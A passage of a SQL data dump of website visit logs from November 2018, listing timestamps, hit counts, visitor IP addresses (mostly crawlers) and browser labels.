1,1,0,0,'8.29.198.27','other'),(334066,1542386168,1,1,0,0,'207.46.13.172','other'),(334067,1542386208,1,1,0,0,'54.36.148.98','other'),(334068,1542386245,1,1,0,0,'66.249.66.155','chrome'),(334069,1542386246,3,3,0,0,'66.249.66.154','chrome'),(334070,1542386441,3,3,0,0,'66.249.66.156','chrome'),(334071,1542386477,2,2,0,0,'66.249.66.42','chrome'),(334072,1542386494,1,1,0,0,'66.249.66.59','chrome'),(334073,1542386691,1,1,0,0,'54.36.149.83','other'),(334074,1542386868,1,1,0,0,'66.249.66.152','chrome'),(334075,1542386889,1,1,0,0,'176.241.132.62','chrome'),(334076,1542386934,3,3,0,0,'216.244.66.241','other'),(334077,1542386935,1,1,0,0,'54.36.149.100','other'),(334078,1542386983,1,1,0,0,'54.36.148.242','other'),(334079,1542387067,2,2,0,0,'46.229.168.148','other'),(334080,1542387119,1,1,0,0,'157.55.39.212','other'),(334081,1542387256,1,1,0,0,'54.36.149.75','other'),(334082,1542387274,1,1,0,0,'54.36.148.240','other'),(334083,1542387382,1,1,0,0,'207.46.13.169','other'),(334084,1542387475,1,1,0,0,'54.36.148.134','other'),(334085,1542387539,2,2,0,0,'66.249.66.156','chrome'),(334086,1542387671,2,2,0,0,'8.29.198.25','other'),(334087,1542387684,1,1,0,0,'54.36.148.149','other'),(334088,1542387820,1,1,0,0,'93.78.185.18','chrome'),(334089,1542387887,1,1,0,0,'54.36.149.58','other'),(334090,1542388037,1,1,0,0,'54.36.148.104','other'),(334091,1542388038,1,1,0,0,'66.249.66.59','chrome'),(334092,1542388039,1,1,0,0,'66.249.66.40','chrome'),(334093,1542388218,1,1,0,0,'54.36.148.82','other'),(334094,1542388341,1,1,0,0,'207.46.13.169','other'),(334095,1542388367,1,1,0,0,'54.36.148.18','other'),(334096,1542388373,1,1,0,0,'54.36.148.24','other'),(334097,1542388485,1,1,0,0,'54.36.148.80','other'),(334098,1542388548,1,1,0,0,'54.36.148.47','other'),(334099,1542388550,1,1,0,0,'46.229.168.135','other'),(334100,1542388555,1,1,0,0,'54.36.148.194','other'),(334101,1542388567,1,1,0,0,'46.229.168.146','other'),(334102,1542388638,1,1,0,0,'54.36.148.131','other'),(334103,1542388730,1,1,0,0,'54.36.148.68','other'),(334104,1542388913,8,8,0,0,'178.154.244.11','other'),(334105,1542388933,18,18,0,0,'178.154.244.29','other'),(334106,1542388986,1,1,0,0,'5.45.207.79','other'),(334107,1542389168,3,3,0,0,'178.165.45.220','chrome'),(334108,1542389264,1,1,0,0,'213.180.203.17','other'),(334110,1542389279,1,1,0,0,'95.108.181.75','other'),(334111,1542389296,1,1,0,0,'141.8.142.144','other'),(334112,1542389304,3,3,0,0,'37.9.113.148','other'),(334113,1542389313,5,5,0,0,'216.244.66.241','other'),(334114,1542389314,2,2,0,0,'141.8.142.108','other'),(334115,1542389316,2,2,0,0,'87.250.224.65','other'),(334116,1542389397,3,3,0,0,'5.45.207.19','other'),(334117,1542389432,1,1,0,0,'54.36.148.185','other'),(334118,1542389475,1,1,0,0,'54.36.148.221','other'),(334119,1542389555,1,1,0,0,'54.36.148.124','other'),(334120,1542389571,1,1,0,0,'66.249.66.44','chrome'),(334121,1542389593,1,1,0,0,'141.8.183.23','other'),(334122,1542389596,1,1,0,0,'141.8.142.103','other'),(334123,1542389604,1,1,0,0,'95.108.181.54','other'),(334124,1542389624,1,1,0,0,'54.36.148.126','other'),(334125,1542389642,1,1,0,0,'54.36.148.179','other'),(334126,1542389714,1,1,0,0,'54.36.148.90','other'),(334127,1542389875,15,15,0,0,'178.154.244.29','other'),(334128,1542389877,1,1,0,0,'87.250.224.47','other'),(334129,1542389897,1,1,0,0,'54.36.148.60','other'),(334130,1542389920,1,1,0,0,'54.36.148.250','other'),(334131,1542389940,8,8,0,0,'178.154.244.11','other'),(334132,1542389972,1,1,0,0,'54.36.148.109','other'),(334133,1542389975,1,1,0,0,'66.249.81.195','chrome'),(334134,1542390019,1,1,0,0,'54.36.148.133','other'),(334135,1542390023,1,1,0,0,'66.249.81.198','chrome'),(334136,1542390030,2,2,0,0,'5.45.207.79','other'),(334137,1542390077,1,1,0,0,'46.211.64.45','chrome'),(334138,1542390186,1,1,0,0,'54.36.148.187','other'),(334139,1542390200,1,1,0,0,'5.45.207.8','other'),(334140,1542390215,1,1,0,0,'54.36.148.80','other'),(334141,1542390232,1,1,0,0,'54.36.148.176','other'),(334142,1542390340,1,1,0,0,'87.250.224.65','other'),(334143,1542390508,1,1,0,0,'54.36.148.253','other'),(334144,1542390570,1,1,0,0,'54.36.149.72','other'),(334145,1542390722,1,1,0,0,'157.55.39.212','other'),(334146,1542390793,7,7,0,0,'178.154.244.29','other'),(334147,1542390874,1,1,0,0,'207.46.13.169','other'),(334148,1542390962,1,1,0,0,'178.154.244.11','other'),(334149,1542390965,2,2,0,0,'66.249.66.152','chrome'),(334150,1542391221,2,2,0,0,'46.211.112.82','chrome'),(334151,1542391416,1,1,0,0,'83.217.214.72','msie'),(334152,1542391432,1,1,0,0,'46.229.168.140','other'),(334153,1542391468,1,1,0,0,'54.36.148.72','other'),(334154,1542391480,1,1,0,0,'54.36.148.10','other'),(334155,1542391650,1,1,0,0,'87.250.224.47','other'),(334156,1542391711,1,1,0,0,'46.229.168.137','other'),(334157,1542391816,5,5,0,0,'216.244.66.241','other'),(334158,1542391853,1,1,0,0,'54.36.148.105','other'),(334159,1542392060,4,4,0,0,'178.154.244.29','other'),(334160,1542392081,1,1,0,0,'54.36.148.47','other'),(334161,1542392173,1,1,0,0,'207.46.13.169','other'),(334162,1542392210,1,1,0,0,'178.154.244.11','other'),(334163,1542392243,1,1,0,0,'54.36.149.59','other'),(334164,1542392254,9,9,0,0,'66.249.66.42','chrome'),(334165,1542392290,17,17,0,0,'66.249.66.40','chrome'),(334166,1542392307,1,1,0,0,'66.249.66.57','chrome'),(334167,1542392324,1,1,0,0,'54.36.149.4','other'),(334168,1542392394,1,1,0,0,'54.36.148.77','other'),(334169,1542392402,2,2,0,0,'66.249.66.44','chrome'),(334170,1542392487,1,1,0,0,'54.36.149.89','other'),(334171,1542392707,1,1,0,0,'54.36.149.66','other'),(334172,1542392782,2,2,0,0,'216.244.66.241','other'),(334173,1542392811,1,1,0,0,'54.36.148.98','other'),(334174,1542392869,1,1,0,0,'54.36.148.156','other'),(334175,1542393017,1,1,0,0,'54.36.148.160','other'),(334176,1542393052,2,2,0,0,'66.249.66.154','chrome'),(334177,1542393070,1,1,0,0,'66.249.66.157','chrome'),(334178,1542393191,1,1,0,0,'54.36.148.78','other'),(334179,1542393254,1,1,0,0,'178.154.244.29','other'),(334180,1542393338,1,1,0,0,'54.36.149.69','other'),(334181,1542393443,1,1,0,0,'54.36.148.166','other'),(334182,1542393478,1,1,0,0,'54.36.148.14','other'),(334183,1542393534,1,1,0,0,'54.36.148.108','other'),(334184,1542393539,1,1,0,0,'54.36.148.127','other'),(334185,1542393577,1,1,0,0,'54.165.59.7','other'),(334186,1542393611,1,1,0,0,'54.36.148.100','other'),(334187,1542393616,1,1,0,0,'157.55.39.212','other'),(334188,1542393622,1,1,0,0,'54.36.148.213','other'),(334189,1542393740,1,1,0,0,'54.36.148.43','other'),(334190,1542393761,2,2,0,0,'66.249.66.61','chrome'),(334191,1542393763,1,1,0,0,'66.249.66.40','chrome'),(334192,1542393792,1,1,0,0,'66.249.66.44','chrome'),(334193,1542393908,1,1,0,0,'54.36.148.119','other'),(334194,1542393950,1,0,1,0,'66.249.66.42',''),(334195,1542394065,1,1,0,0,'46.229.168.149','other'),(334196,1542394070,1,1,0,0,'46.229.168.146','other'),(334197,1542394224,1,1,0,0,'54.36.149.34','other'),(334198,1542394257,1,1,0,0,'54.36.149.8','other'),(334199,1542394278,1,1,0,0,'188.255.83.100','msie'),(334200,1542394307,8,8,0,0,'216.244.66.241','other'),(334201,1542394427,1,1,0,0,'54.36.148.47','other'),(334202,1542394432,1,1,0,0,'54.36.148.72','other'),(334203,1542394638,1,1,0,0,'54.36.148.30','other'),(334204,1542394760,1,1,0,0,'54.36.149.9','other'),(334205,1542394767,1,1,0,0,'66.249.66.152','chrome'),(334206,1542394939,1,1,0,0,'54.36.148.206','other'),(334207,1542394965,1,1,0,0,'54.36.149.82','other'),(334208,1542394967,1,1,0,0,'54.36.148.15','other'),(334209,1542395006,1,1,0,0,'54.36.149.94','other'),(334210,1542395191,1,1,0,0,'54.36.148.99','other'),(334211,1542395216,1,1,0,0,'178.154.244.29','other'),(334212,1542395329,1,1,0,0,'54.36.148.93','other'),(334213,1542395497,1,1,0,0,'46.229.168.141','other'),(334214,1542395650,1,1,0,0,'54.36.148.36','other'),(334215,1542395698,1,1,0,0,'46.229.168.151','other'),(334216,1542395703,1,1,0,0,'46.229.168.130','other'),(334217,1542395802,1,1,0,0,'54.36.149.85','other'),(334218,1542396026,1,1,0,0,'54.36.148.107','other'),(334219,1542396106,1,1,0,0,'54.36.148.47','other'),(334220,1542396134,1,1,0,0,'207.46.13.224','other'),(334221,1542396476,1,1,0,0,'66.249.66.155','chrome'),(334222,1542396477,1,1,0,0,'66.249.66.152','chrome'),(334223,1542396513,1,1,0,0,'54.36.148.242','other'),(334224,1542396599,1,1,0,0,'54.36.148.92','other'),(334225,1542396690,1,1,0,0,'54.36.148.141','other'),(334226,1542396740,3,3,0,0,'216.244.66.241','other'),(334227,1542396851,1,1,0,0,'54.36.148.55','other'),(334228,1542396860,1,1,0,0,'54.36.148.122','other'),(334229,1542396965,1,1,0,0,'54.36.148.241','other'),(334230,1542397003,1,1,0,0,'8.29.198.25','other'),(334231,1542397064,1,1,0,0,'54.36.148.183','other'),(334232,1542397384,1,1,0,0,'54.36.149.79','other'),(334233,1542397392,1,1,0,0,'54.36.148.174','other'),(334234,1542397468,1,1,0,0,'54.36.149.54','other'),(334235,1542397489,1,1,0,0,'54.36.148.158','other'),(334236,1542397491,1,1,0,0,'157.55.39.212','other'),(334237,1542397538,2,2,0,0,'91.196.178.61','chrome'),(334238,1542397574,1,1,0,0,'46.229.168.139','other'),(334239,1542397746,1,1,0,0,'54.36.149.89','other'),(334240,1542397879,1,1,0,0,'54.36.149.36','other'),(334241,1542397909,1,1,0,0,'54.36.149.22','other'),(334242,1542398005,1,1,0,0,'54.36.148.31','other'),(334243,1542398057,1,1,0,0,'207.46.13.207','other'),(334244,1542398089,1,1,0,0,'40.77.167.183','other'),(334245,1542398104,1,1,0,0,'66.249.66.42','chrome'),(334246,1542398324,1,1,0,0,'54.36.148.34','other'),(334247,1542398409,1,1,0,0,'54.36.148.118','other'),(334248,1542398410,1,1,0,0,'66.249.66.154','chrome'),(334249,1542398423,1,1,0,0,'66.249.66.44','chrome'),(334250,1542398445,1,1,0,0,'66.249.66.40','chrome'),(334251,1542398512,1,1,0,0,'8.29.198.25','other'),(334252,1542398636,1,1,0,0,'54.36.148.166','other'),(334253,1542398656,1,1,0,0,'54.36.148.193','other'),(334254,1542398742,1,1,0,0,'54.36.149.7','other'),(334255,1542398894,1,1,0,0,'157.55.39.212','other'),(334256,1542398989,1,1,0,0,'54.36.148.23','other'),(334257,1542399109,1,1,0,0,'8.29.198.26','other'),(334258,1542399127,1,1,0,0,'54.36.149.4','other'),(334259,1542399144,1,1,0,0,'46.229.168.148','other'),(334260,1542399148,1,1,0,0,'46.229.168.133','other'),(334261,1542399158,1,1,0,0,'54.36.149.31','other'),(334262,1542399289,1,1,0,0,'54.36.148.63','other'),(334263,1542399502,1,1,0,0,'66.249.66.44','chrome'),(334264,1542399519,31,31,0,0,'66.249.66.40','chrome'),(334265,1542399555,8,8,0,0,'66.249.66.42','chrome'),(334266,1542399561,1,1,0,0,'207.46.13.169','other'),(334267,1542399618,2,2,0,0,'216.244.66.241','other'),(334268,1542399645,1,1,0,0,'54.36.148.216','other'),(334269,1542399790,1,1,0,0,'188.163.32.81','firefox'),(334270,1542399843,1,1,0,0,'46.229.168.152','other'),(334271,1542399891,1,1,0,0,'54.36.148.164','other'),(334272,1542400028,1,1,0,0,'54.36.148.52','other'),(334273,1542400244,1,1,0,0,'157.55.39.212','other'),(334274,1542400259,1,1,0,0,'54.36.148.79','other'),(334275,1542400417,1,1,0,0,'54.36.148.165','other'),(334276,1542400453,2,2,0,0,'54.36.148.70','other'),(334277,1542400561,1,1,0,0,'40.77.167.192','other'),(334278,1542400566,2,2,0,0,'207.46.13.224','other'),(334279,1542400746,1,1,0,0,'54.36.148.100','other'),(334280,1542400753,1,1,0,0,'54.36.148.231','other'),(334281,1542400835,1,1,0,0,'46.229.168.147','other'),(334282,1542400841,1,1,0,0,'46.229.168.138','other'),(334283,1542400920,1,1,0,0,'54.36.148.232','other'),(334284,1542401009,1,1,0,0,'216.244.66.241','other'),(334285,1542401017,1,1,0,0,'54.36.149.8','other'),(334286,1542401069,1,1,0,0,'66.249.66.42','chrome'),(334287,1542401150,1,1,0,0,'54.36.149.66','other'),(334288,1542401206,1,1,0,0,'54.36.148.32','other'),(334289,1542401248,9,9,0,0,'178.154.244.29','other'),(334290,1542401398,3,3,0,0,'178.154.244.11','other'),(334291,1542401402,1,1,0,0,'95.73.255.182','firefox'),(334292,1542401480,1,1,0,0,'188.163.5.20','chrome'),(334293,1542401498,1,1,0,0,'54.36.148.123','other'),(334294,1542401564,2,2,0,0,'46.211.26.19','chrome'),(334295,1542401673,1,1,0,0,'54.36.148.244','other'),(334296,1542401873,1,1,0,0,'66.249.66.40','chrome'),(334297,1542401889,1,1,0,0,'54.36.149.32','other'),(334298,1542401954,1,1,0,0,'216.244.66.241','other'),(334299,1542401978,1,1,0,0,'54.36.148.177','other'),(334300,1542402044,1,1,0,0,'157.55.39.212','other'),(334301,1542402080,1,1,0,0,'54.36.148.120','other'),(334302,1542402307,1,1,0,0,'54.36.148.251','other'),(334303,1542402377,1,1,0,0,'54.36.149.58','other'),(334304,1542402417,1,1,0,0,'54.36.148.103','other'),(334305,1542402450,1,1,0,0,'54.36.148.86','other'),(334306,1542402495,1,1,0,0,'54.36.149.104','other'),(334307,1542402645,1,1,0,0,'54.36.149.71','other'),(334308,1542402706,1,1,0,0,'66.249.66.57','chrome'),(334309,1542402707,1,1,0,0,'66.249.66.42','chrome'),(334310,1542402776,1,1,0,0,'54.36.148.101','other'),(334311,1542402910,1,1,0,0,'46.229.168.147','other'),(334312,1542402914,1,1,0,0,'46.229.168.146','other'),(334313,1542402978,1,1,0,0,'46.229.168.134','other'),(334314,1542403193,1,1,0,0,'54.36.148.170','other'),(334315,1542403494,1,1,0,0,'207.46.13.169','other'),(334316,1542403551,1,1,0,0,'46.229.168.129','other'),(334317,1542403555,1,1,0,0,'46.229.168.144','other'),(334318,1542403860,2,2,0,0,'66.249.66.156','chrome'),(334319,1542403867,1,1,0,0,'54.36.148.200','other'),(334320,1542403896,1,1,0,0,'66.249.66.154','chrome'),(334321,1542404208,2,2,0,0,'52.53.201.78','chrome'),(334322,1542404375,1,1,0,0,'66.249.66.152','chrome'),(334323,1542404406,4,4,0,0,'216.244.66.241','other'),(334324,1542404502,1,1,0,0,'178.154.244.29','other'),(334325,1542404517,1,1,0,0,'54.36.148.232','other'),(334326,1542404607,1,1,0,0,'207.46.13.207','other'),(334327,1542404687,1,1,0,0,'54.36.148.250','other'),(334328,1542405010,1,1,0,0,'54.36.149.8','other'),(334329,1542405057,1,1,0,0,'54.36.148.128','other'),(334330,1542405356,2,2,0,0,'66.249.66.154','chrome'),(334331,1542405382,1,1,0,0,'54.36.148.196','other'),(334332,1542405426,1,1,0,0,'66.249.66.156','chrome'),(334333,1542405445,2,2,0,0,'66.249.66.42','chrome'),(334334,1542405465,1,1,0,0,'54.36.148.33','other'),(334335,1542405577,1,1,0,0,'178.216.188.88','chrome'),(334336,1542405813,2,2,0,0,'66.249.66.40','chrome'),(334337,1542405814,1,1,0,0,'54.36.148.62','other'),(334338,1542405867,1,1,0,0,'54.36.148.161','other'),(334339,1542405888,1,1,0,0,'54.36.148.91','other'),(334340,1542405930,1,1,0,0,'54.36.148.158','other'),(334341,1542406089,1,1,0,0,'66.249.66.155','chrome'),(334342,1542406100,1,1,0,0,'54.36.148.155','other'),(334343,1542406166,1,1,0,0,'54.36.148.247','other'),(334344,1542406429,2,2,0,0,'66.249.66.156','chrome'),(334345,1542406442,2,2,0,0,'66.249.66.152','chrome'),(334346,1542406445,1,1,0,0,'54.36.148.93','other'),(334348,1542406484,1,1,0,0,'54.36.148.46','other'),(334349,1542406545,1,1,0,0,'54.36.149.37','other'),(334350,1542406747,1,1,0,0,'54.36.149.11','other'),(334351,1542406764,1,1,0,0,'54.36.148.163','other'),(334352,1542406765,1,1,0,0,'54.36.149.91','other'),(334353,1542406773,1,1,0,0,'54.36.149.54','other'),(334354,1542406878,1,1,0,0,'54.36.148.174','other'),(334355,1542407032,1,1,0,0,'66.249.66.154','chrome'),(334356,1542407076,1,1,0,0,'54.36.149.100','other'),(334357,1542407209,1,1,0,0,'46.229.168.133','other'),(334358,1542407239,1,1,0,0,'54.36.148.201','other'),(334359,1542407271,1,1,0,0,'54.36.148.219','other'),(334360,1542407279,1,1,0,0,'54.36.148.175','other'),(334361,1542407312,1,1,0,0,'66.249.66.44','chrome'),(334362,1542407417,1,1,0,0,'207.46.13.169','other'),(334363,1542407609,1,1,0,0,'54.36.149.64','other'),(334364,1542407623,1,1,0,0,'216.244.66.241','other'),(334365,1542407685,1,1,0,0,'54.36.148.87','other'),(334366,1542407742,1,1,0,0,'54.36.148.120','other'),(334367,1542407769,1,1,0,0,'54.36.148.200','other'),(334368,1542407785,1,1,0,0,'46.229.168.153','other'),(334369,1542407788,1,1,0,0,'46.229.168.150','other'),(334370,1542407789,1,1,0,0,'54.36.149.8','other'),(334372,1542407807,1,1,0,0,'54.36.149.76','other'),(334373,1542407844,1,1,0,0,'8.29.198.25','other'),(334374,1542407857,1,1,0,0,'66.249.66.152','chrome'),(334375,1542408235,1,1,0,0,'54.36.148.91','other'),(334376,1542408738,1,1,0,0,'37.73.140.117','chrome'),(334377,1542408962,1,1,0,0,'54.36.148.102','other'),(334378,1542409076,1,1,0,0,'54.36.148.190','other'),(334379,1542409253,1,1,0,0,'66.249.66.152','chrome'),(334380,1542409285,1,1,0,0,'54.36.148.245','other'),(334381,1542409357,2,2,0,0,'8.29.198.25','other'),(334382,1542409465,1,1,0,0,'54.36.148.42','other'),(334383,1542409534,1,1,0,0,'54.36.149.14','other'),(334384,1542409619,4,4,0,0,'216.244.66.241','other'),(334385,1542409718,1,1,0,0,'54.36.149.31','other'),(334386,1542409803,1,1,0,0,'54.36.149.38','other'),(334387,1542409810,1,1,0,0,'54.36.149.78','other'),(334388,1542409828,1,1,0,0,'54.36.149.66','other'),(334389,1542410016,1,1,0,0,'54.36.148.99','other'),(334390,1542410021,1,1,0,0,'66.249.66.156','chrome'),(334391,1542410022,1,1,0,0,'66.249.66.154','chrome'),(334392,1542410400,1,1,0,0,'54.36.148.117','other'),(334393,1542410453,1,1,0,0,'54.36.148.28','other'),(334394,1542410511,1,1,0,0,'46.229.168.148','other'),(334395,1542410617,1,1,0,0,'54.36.148.53','other'),(334396,1542410623,1,1,0,0,'54.36.148.51','other'),(334397,1542410627,2,2,0,0,'207.46.13.172','other'),(334398,1542410755,1,1,0,0,'54.36.148.115','other'),(334399,1542410785,1,1,0,0,'54.36.149.82','other'),(334400,1542411097,2,2,0,0,'66.249.66.156','chrome'),(334401,1542411220,1,1,0,0,'54.36.148.143','other'),(334402,1542411252,1,1,0,0,'66.249.66.155','chrome'),(334403,1542411331,1,1,0,0,'54.36.148.78','other'),(334404,1542411474,2,2,0,0,'54.36.148.13','other'),(334405,1542411491,1,1,0,0,'54.36.148.10','other'),(334406,1542411669,1,1,0,0,'54.36.149.26','other'),(334407,1542411915,1,1,0,0,'54.36.148.41','other'),(334408,1542411932,1,1,0,0,'54.36.149.85','other'),(334409,1542412007,1,1,0,0,'54.36.148.212','other'),(334410,1542412019,1,1,0,0,'54.36.148.183','other'),(334411,1542412087,6,6,0,0,'216.244.66.241','other'),(334412,1542412133,1,1,0,0,'54.36.148.111','other'),(334413,1542412134,2,2,0,0,'54.36.149.97','other'),(334414,1542412164,1,1,0,0,'54.36.148.104','other'),(334415,1542412217,1,1,0,0,'54.36.148.137','other'),(334416,1542412472,1,1,0,0,'54.36.148.64','other'),(334417,1542412517,1,1,0,0,'149.202.170.60','other'),(334418,1542412602,1,1,0,0,'54.36.149.96','other'),(334419,1542412838,1,1,0,0,'54.36.148.194','other'),(334420,1542412868,1,1,0,0,'54.36.148.18','other'),(334421,1542413026,1,1,0,0,'54.36.148.166','other'),(334422,1542413192,1,1,0,0,'54.36.149.37','other'),(334423,1542413256,1,1,0,0,'66.249.66.156','chrome'),(334424,1542413259,1,1,0,0,'54.36.148.21','other'),(334425,1542413415,1,1,0,0,'66.249.66.61','chrome'),(334426,1542413416,2,1,1,0,'66.249.66.42',''),(334427,1542413524,20,20,0,0,'178.154.244.29','other'),(334428,1542413610,15,15,0,0,'178.154.244.11','other'),(334429,1542413645,1,1,0,0,'54.36.148.88','other'),(334430,1542413753,1,1,0,0,'54.36.148.10','other'),(334431,1542413776,1,1,0,0,'54.36.148.118','other'),(334432,1542413788,1,0,1,0,'66.249.66.57',''),(334433,1542413834,2,2,0,0,'5.45.207.79','other'),(334434,1542413864,1,1,0,0,'66.249.66.42','chrome'),(334435,1542413935,1,1,0,0,'66.249.66.40','chrome'),(334436,1542413942,1,1,0,0,'46.229.168.142','other'),(334437,1542413958,1,1,0,0,'54.36.149.53','other'),(334438,1542414018,1,1,0,0,'66.249.66.44','chrome'),(334439,1542414032,1,1,0,0,'54.36.148.184','other'),(334440,1542414045,1,1,0,0,'54.36.148.115','other'),(334441,1542414136,3,3,0,0,'5.45.207.19','other'),(334442,1542414198,1,1,0,0,'54.36.149.39','other'),(334443,1542414404,1,1,0,0,'54.36.148.46','other'),(334444,1542414445,1,1,0,0,'157.55.39.212','other'),(334445,1542414506,1,1,0,0,'54.36.148.76','other'),(334446,1542414518,2,2,0,0,'178.154.244.11','other'),(334447,1542414533,5,5,0,0,'178.154.244.29','other'),(334448,1542414585,1,1,0,0,'46.229.168.151','other'),(334449,1542414588,1,1,0,0,'46.229.168.147','other'),(334450,1542414641,1,1,0,0,'54.36.148.153','other'),(334451,1542414733,1,1,0,0,'54.36.148.176','other'),(334452,1542414767,1,1,0,0,'5.45.207.79','other'),(334453,1542414787,3,3,0,0,'216.244.66.241','other'),(334454,1542414910,1,1,0,0,'66.249.66.42','chrome'),(334455,1542414915,1,1,0,0,'54.36.148.13','other'),(334456,1542414963,1,1,0,0,'31.184.238.107','chrome'),(334457,1542415034,1,1,0,0,'54.36.148.211','other'),(334458,1542415070,1,1,0,0,'54.36.148.157','other'),(334459,1542415100,1,1,0,0,'54.36.148.241','other'),(334460,1542415379,1,1,0,0,'157.55.39.212','other'),(334461,1542415386,1,1,0,0,'207.46.13.207','other'),(334462,1542415424,1,1,0,0,'54.36.148.25','other'),(334463,1542415450,1,1,0,0,'54.36.149.10','other'),(334464,1542415469,1,1,0,0,'66.249.66.157','chrome'),(334465,1542415470,1,1,0,0,'66.249.66.154','chrome'),(334466,1542415603,1,1,0,0,'54.36.148.17','other'),(334467,1542415725,1,1,0,0,'216.244.66.241','other'),(334468,1542415779,1,1,0,0,'54.36.149.90','other'),(334469,1542415820,1,1,0,0,'54.36.149.64','other'),(334470,1542415937,1,1,0,0,'54.36.149.25','other'),(334471,1542416076,1,1,0,0,'54.36.149.67','other'),(334472,1542416180,1,1,0,0,'54.36.148.53','other'),(334473,1542416291,1,1,0,0,'178.154.244.11','other'),(334474,1542416430,1,1,0,0,'54.36.148.180','other'),(334475,1542416767,1,1,0,0,'54.36.148.31','other'),(334476,1542416788,1,1,0,0,'54.36.149.61','other'),(334477,1542416809,1,1,0,0,'54.36.148.39','other'),(334478,1542417012,1,1,0,0,'54.36.148.70','other'),(334479,1542417147,1,1,0,0,'54.36.148.206','other'),(334480,1542417296,1,1,0,0,'54.36.149.83','other'),(334481,1542417331,1,1,0,0,'54.36.148.254','other'),(334482,1542417356,5,5,0,0,'216.244.66.241','other'),(334483,1542417636,1,1,0,0,'54.36.148.209','other'),(334484,1542417821,1,1,0,0,'54.36.149.106','other'),(334485,1542417859,1,1,0,0,'54.36.148.65','other'),(334486,1542417935,1,1,0,0,'54.36.149.6','other'),(334487,1542417990,1,1,0,0,'207.46.13.169','other'),(334488,1542418227,1,1,0,0,'54.36.148.255','other'),(334489,1542418312,1,1,0,0,'157.55.39.212','other'),(334490,1542418319,1,1,0,0,'54.36.149.107','other'),(334491,1542418332,1,1,0,0,'54.36.148.241','other'),(334492,1542418342,1,1,0,0,'54.36.148.213','other'),(334493,1542418402,1,1,0,0,'66.249.66.157','chrome'),(334495,1542418573,1,1,0,0,'46.166.190.165','other'),(334496,1542418605,1,1,0,0,'54.36.149.98','other'),(334497,1542418669,1,1,0,0,'54.36.148.230','other'),(334498,1542418675,1,1,0,0,'8.29.198.26','other'),(334499,1542418851,1,1,0,0,'54.36.149.3','other'),(334500,1542419021,1,1,0,0,'54.36.148.165','other'),(334501,1542419034,1,1,0,0,'54.36.149.22','other'),(334502,1542419567,1,1,0,0,'54.36.148.36','other'),(334503,1542419596,1,1,0,0,'54.36.149.66','other'),(334504,1542419600,1,1,0,0,'54.36.148.220','other'),(334505,1542419648,1,1,0,0,'54.36.149.101','other'),(334506,1542419733,1,1,0,0,'54.36.148.25','other'),(334507,1542419874,1,1,0,0,'54.36.148.117','other'),(334508,1542420112,1,1,0,0,'40.77.167.183','other'),(334509,1542420147,1,1,0,0,'54.36.148.251','other'),(334510,1542420208,1,1,0,0,'8.29.198.25','other'),(334511,1542420225,3,3,0,0,'216.244.66.241','other'),(334512,1542420233,1,1,0,0,'46.229.168.140','other'),(334513,1542420267,1,1,0,0,'54.36.148.104','other'),(334514,1542420411,1,1,0,0,'207.46.13.231','other'),(334515,1542420415,1,1,0,0,'40.77.167.215','other'),(334516,1542420697,1,1,0,0,'54.36.149.33','other'),(334517,1542420788,1,1,0,0,'8.29.198.27','other'),(334518,1542420884,2,2,0,0,'35.161.37.72','chrome'),(334519,1542420891,1,1,0,0,'54.36.148.247','other'),(334520,1542420947,1,1,0,0,'54.36.148.242','other'),(334521,1542421041,1,1,0,0,'54.36.148.196','other'),(334522,1542421412,1,1,0,0,'66.249.66.59','chrome'),(334523,1542421413,1,1,0,0,'66.249.66.42','chrome'),(334524,1542421455,1,1,0,0,'54.36.148.220','other'),(334525,1542421614,1,1,0,0,'54.36.148.248','other'),(334526,1542421623,1,1,0,0,'207.46.13.172','other'),(334527,1542421777,2,2,0,0,'207.46.13.169','other'),(334528,1542421980,1,1,0,0,'66.249.66.154','chrome'),(334529,1542422654,1,1,0,0,'216.244.66.241','other'),(334530,1542422938,1,1,0,0,'54.36.148.81','other'),(334531,1542423109,2,2,0,0,'40.77.167.192','other'),(334532,1542423113,1,1,0,0,'54.36.148.170','other'),(334534,1542423494,1,1,0,0,'54.36.148.161','other'),(334535,1542423535,1,1,0,0,'46.229.168.130','other'),(334536,1542423763,1,1,0,0,'54.36.148.187','other'),(334537,1542423767,1,1,0,0,'54.36.149.79','other'),(334538,1542423778,1,1,0,0,'207.46.13.169','other'),(334539,1542424004,1,1,0,0,'54.36.148.126','other'),(334540,1542424202,2,2,0,0,'40.77.167.192','other'),(334541,1542424241,1,1,0,0,'46.229.168.129','other'),(334542,1542424281,1,1,0,0,'54.36.148.239','other'),(334543,1542424321,1,1,0,0,'54.36.148.77','other'),(334544,1542424356,1,1,0,0,'46.229.168.152','other'),(334545,1542424479,1,1,0,0,'66.249.66.156','chrome'),(334546,1542424550,1,1,0,0,'54.36.148.224','other'),(334547,1542424712,1,1,0,0,'66.249.66.154','chrome'),(334548,1542424775,5,5,0,0,'216.244.66.241','other'),(334549,1542424985,1,1,0,0,'178.154.244.11','other'),(334550,1542425485,1,1,0,0,'54.36.148.58','other'),(334551,1542425802,1,1,0,0,'54.36.148.186','other'),(334552,1542425822,1,1,0,0,'66.249.66.44','chrome'),(334553,1542426001,1,1,0,0,'40.77.167.183','other'),(334554,1542426368,1,1,0,0,'54.36.148.100','other'),(334555,1542426668,1,1,0,0,'54.36.148.177','other'),(334556,1542426767,1,1,0,0,'46.229.168.144','other'),(334557,1542426770,1,1,0,0,'46.229.168.130','other'),(334558,1542426789,1,1,0,0,'66.249.66.152','chrome'),(334559,1542426874,20,20,0,0,'178.154.244.29','other'),(334560,1542426878,13,13,0,0,'178.154.244.11','other'),(334561,1542426897,10,10,0,0,'5.45.207.79','other'),(334562,1542427024,1,1,0,0,'95.108.213.4','other'),(334563,1542427183,1,1,0,0,'87.250.224.47','other'),(334564,1542427186,2,2,0,0,'5.45.207.19','other'),(334565,1542427222,1,1,0,0,'46.229.168.141','other'),(334566,1542427318,1,1,0,0,'54.36.148.116','other'),(334567,1542427455,4,4,0,0,'216.244.66.241','other'),(334568,1542427667,1,1,0,0,'207.46.13.169','other'),(334569,1542427694,1,1,0,0,'46.229.168.136','other'),(334570,1542427797,1,1,0,0,'54.36.148.106','other'),(334571,1542427846,11,11,0,0,'178.154.244.29','other'),(334572,1542427989,3,3,0,0,'178.154.244.11','other'),(334573,1542428168,1,1,0,0,'207.46.13.172','other'),(334574,1542429215,1,1,0,0,'54.36.148.143','other'),(334575,1542429269,1,1,0,0,'54.36.148.150','other'),(334576,1542429334,1,1,0,0,'54.36.149.11','other'),(334577,1542429505,1,1,0,0,'8.29.198.26','other'),(334578,1542429774,1,1,0,0,'46.229.168.149','other'),(334579,1542430113,5,5,0,0,'216.244.66.241','other'),(334580,1542430184,1,1,0,0,'54.36.148.36','other'),(334581,1542430311,1,1,0,0,'207.4